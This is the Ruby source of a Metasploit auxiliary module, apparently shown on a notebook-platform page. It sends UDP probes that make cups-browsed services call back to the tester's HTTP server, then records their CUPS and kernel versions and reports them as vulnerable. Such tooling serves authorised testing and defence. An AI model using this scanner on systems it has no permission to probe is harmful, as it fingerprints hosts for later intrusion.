Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Auxiliary::UDPScanner
9
  include Msf::Exploit::Remote::HttpServer
10

11
  def initialize
12
    super(
13
      'Name' => 'cups-browsed Information Disclosure',
14
      'Description' => %q{
15
        Retrieve CUPS version and kernel version information from cups-browsed services.
16
      },
17
      'Author' => [
18
        'evilsocket', # discovery
19
        'bcoles' # msf
20
      ],
21
      'License' => MSF_LICENSE,
22
      'References' => [
23
        ['URL', 'https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8' ],
24
        ['URL', 'https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/' ],
25
      ],
26
      'DefaultOptions' => { 'RPORT' => 631 },
27
    )
28
    deregister_options('URIPATH')
29
  end
30

31
  def build_probe
32
    @probe ||= "0 3 #{get_uri}"
33
    @probe
34
  end
35

36
  def run
37
    start_service('Path' => "/printers/#{Rex::Text.rand_text_alphanumeric(10..16)}")
38
    super
39
  end
40

41
  def on_request_uri(cli, request)
42
    return if request.nil?
43

44
    info = request['User-Agent']
45

46
    return unless info.to_s.include?('CUPS')
47

48
    print_good("#{cli.peerhost}: #{info}")
49

50
    report_host(host: cli.peerhost)
51
    report_service(
52
      host: cli.peerhost,
53
      proto: 'udp',
54
      port: rport,
55
      name: 'cups-browsed',
56
      info: info
57
    )
58
    report_vuln({
59
      host: cli.peerhost,
60
      port: rport,
61
      proto: 'udp',
62
      name: 'cups-browsed Information Disclosure',
63
      refs: references
64
    })
65
  end
66
end
67

68